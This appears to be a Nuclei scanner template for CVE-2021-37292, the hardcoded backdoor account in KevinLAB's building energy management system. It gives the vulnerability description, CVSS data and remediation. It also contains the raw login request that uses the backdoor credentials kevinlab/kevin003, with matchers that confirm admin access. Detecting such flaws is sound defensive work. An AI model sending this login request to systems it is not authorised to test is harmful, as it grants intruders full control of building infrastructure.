id: CVE-2021-37292

info:
  name: KevinLAB BEMS (Building Energy Management System) - Backdoor Account
  author: gy741
  severity: high
  description: |
    KevinLAB BEMS has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
  impact: |
    Attackers using hardcoded backdoor credentials (kevinlab/kevin003) can gain full administrative access with highest privileges to KevinLAB BEMS, bypassing all authentication mechanisms.
  remediation: |
    Remove the hardcoded backdoor account or upgrade to a patched version of KevinLAB BEMS.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
    - https://nvd.nist.gov/vuln/detail/cve-2021-37292
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-37292
    epss-score: 0.0662
    epss-percentile: 0.93017
    cwe-id: NVD-CWE-Other
    cpe: cpe:2.3:a:kevinlab:4st_l-bems:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kevinlab
    product: 4st_l-bems
  tags: cve,cve2021,kevinlab,bems,backdoor,vuln

http:
  - raw:
      - |
        POST /http/index.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'data":"[A-Za-z0-9-]+'
          - 'login_key":"[A-Za-z0-9-]+'
        condition: or

      - type: word
        part: body
        words:
          - '"result":true'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d520346da40c180427c8097d29917acb372189da79134b4256dca94e2e8d0196022100c24d6718e01365d04536b1eee42a2efcf6d94e6329b60abc266210703221c33e:922c64590222798bb761d5b6d8e72950